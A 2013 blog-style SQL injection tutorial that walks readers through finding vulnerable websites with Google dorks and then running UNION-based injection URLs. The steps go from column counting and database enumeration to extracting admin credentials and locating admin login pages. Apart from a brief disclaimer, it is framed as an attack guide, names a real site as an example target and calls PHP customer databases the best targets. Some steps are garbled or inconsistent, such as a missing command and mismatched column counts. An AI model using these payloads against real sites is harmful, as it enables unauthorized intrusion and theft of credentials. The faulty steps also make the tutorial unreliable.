2 Dec 2013

SQL injection Tutorial : The Power of SQLi


In this article, you will learn how to perform a SQL injection attack on a website. Please note that this article is for instructional purposes only. If you successfully breach a website that does not belong to you, you are in violation of federal law and could face incarceration and hefty fines. That said, it is useful to understand how SQL injection works so that you can prevent it from occurring on your own website.

What is a SQL Injection?

SQL injection is a code injection technique that exploits a security vulnerability within the database layer of an application. This vulnerability can be found when user input is incorrectly filtered for string literal escape characters embedded in SQL statements.

Watch your Target :->

One of the easiest ways to find vulnerable sites is known as Google Dorking. In this context, a dork is a specific search query that finds websites meeting the parameters of the advanced query you input. Some examples of dorks you can use to find sites vulnerable to a SQL injection attack include:
inurl:newsitem.php?num= andinurl:index.php?id=
These are some universal used dorks.Want more dork list... google it you can find huge list of dorks..

Remember that a SQL injection attack can work on any SQL database, but PHP-based websites are usually your best targets because they can be set up by just about anyone (i.e. WordPress) and often contain lots of valuable information about customers within the database you are attempting to hack.

Let's do Attack :->

Navigate to one of the websites you found. For this example, assume that one of the search results is http://www.udemy.com/index.php?catid=1. To find out if this site is vulnerable to SQL injection, simply add an apostrophe at the end of the URL like this:
Press enter and see what the website does. If the page returns a SQL error, the website is vulnerable to SQL injection. If the page loads normally, it is not a candidate for SQL injection and you should move on to the next URL in your list.
After locating a vulnerable site, you need to figure out how many columns are in the SQL database and how many of those columns are able to accept queries from you. Append an “order by” statement to the URL like this:
http://www.example.com/index.php?catid=1 order by 1--
Continue to increase the number after “order by” until you get an error. The number of columns in the SQL database is the highest number before you receive an error. The two hyphen's (--) are critical for executing the command. The two hyphens will tell the site that it's a command, and will execute. So we NEED those at the end of every command.
Like :
  • http://www.example.com/index.php?catid=1 order by 1--
  • http://www.example.com/index.php?catid=1 order by 2--
  • http://www.example.com/index.php?catid=1 order by 3--
  • http://www.example.com/index.php?catid=1 order by 4--
  • http://www.example.com/index.php?catid=1 order by 5--

You can do this by appending an “Union Select” statement to the URL. A union select statement in this URL would look like this:
http://www.example.com/index.php?catid=-1 union select 1,2,3,4,5,6--
There are a couple of things to note in this example. Before the number one (after catid), you need to add a hyphen (-). Also, the number of columns you discovered in the previous step is the number of digits you put after the union select statement. For instance, if you discovered that the database had 12 columns, you would append:
         catid=-1 union select 1,2,3,4,5,6--
The results of this query will be the column numbers that are actually accepting queries from you. You can choose any one of these columns to inject your SQL statements.

A couple of number will appear on your screen. That is normal, and is a good sign. Those numbers, are the numbers of columns that are vulnerable to SQL Injection. So those are the columns we need to execute our commands in. So lets say that column 2 appeared on the Page. We will be executing commands in column 2.
So our vulnerable column is 2. So that's where we'll be executing the code. Replace the 2 with your command.
 The command is:   

So your URL should now look like this:

http://www.example.com/index.php?catid=1 union select 1,@@version,3,4,5,6--

Now it should display the Version on the page. 
It should look something like this:           5.1.47-community-log

The numbers don't matter, as long as they're at least 5, or over.
The name of the Database is important. At least if we want to look in the Tables which will contain the information. 

Exploit vulnerable Database :->

To find the name of the database, there are 2 most common ways. They both will work. 
The first command is:
http://www.example.com/index.php?catid=1 union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata--
Sometimes, that command will show you more than the Database name. But all we want is the database name, so the better command would prefferably be:

http://www.example.com/index.php?catid=1 union select 1,concat(database()),3,4,5,6--

Now you will be showed the Database name. Congrats, look how far we are already. Now to the good stuff!

The tables are what contains information. That's why we need to view them. So we can get the information we seek.

The command to view the tables is longer than the few we've seen already. So here's what your URL should now look like:

http://www.example.com/index.php?catid=1  union select 1, group_concat(table_name),3,4 FROM  information_schema.tables WHERE table_schema=database()--

We will most likely be given many tables. It is up to you to decide which one contains the valuable information.

So it can be at times difficult to choose a table that would contain important information. However, we will not always need the username, as it is most likely "admin". But the password, is what we REALLY need.
So choose a table. The one I will use for this example will be "admin_credentials".
 It's very rare that you'll get a Table with a title basically making you choose that one.
So this time use this query/command:

http://www.example.com/index.php?catid=1  union select 1, group_concat(column_name),3,4 FROM  information_schema.columns WHERE table_name="admin_credentials"

For that query, you will almost ALWAYS get an error. So instead, convert the 'admin_credentials' to Hex.

To do that, Everyone use this Addon for Firefox:
Download (HackBar Addon)

Once you've converted your Table Name to Hex, you'll need to use the query again, but with Hex. So it should look like this:

    http://www.example.com/index.php?catid=1   union select 1,group_concat(column_name),3,4 FROM  information_schema.columns WHERE  table_name="0x61646d696e5f63726564656e7469616c73"

You MUST have the 0x after the =. The 0x will let the site know that you are executing the command with HEX. So it's critical. Otherwise, it will NOT work.

There will still be some tables inside the table you've chosen. So you need to get the information, and that will usually mean goodbye tables, and HELLO Admin Panel access.

Let's say that mine is displaying "userpassword" and "user". Those are the only columns that are displaying for me (However, this will very rarely be the case). So we need to access the information in there. We can access them both at a time actually. 

But if you prefer one at a time, use this query:

http://www.example.com/index.php?catid=1 union select 1, group_concat(userpword),3,4 FROM  DBName.admin_credentials--

That will display the information. Where it says DBName, you need to put the name of the Database you got earlier in this tutorial. An where it says admin_credentials, you need to put the table that you are inside of.

Now we should have all the credentials, so we just need to find the Admin Login.

Usually, all you'll have to do is take a quick look by adding a small /admin or /index.php/admin.


And there are plenty more. At times, you will not find the Login, so you'll need an "Admin Login" finder. There are some online, and there are also downloads. I recommend doing it manually, because it brings a more proud-ness after hacking the Website.
Source : wikipedia,udemy.com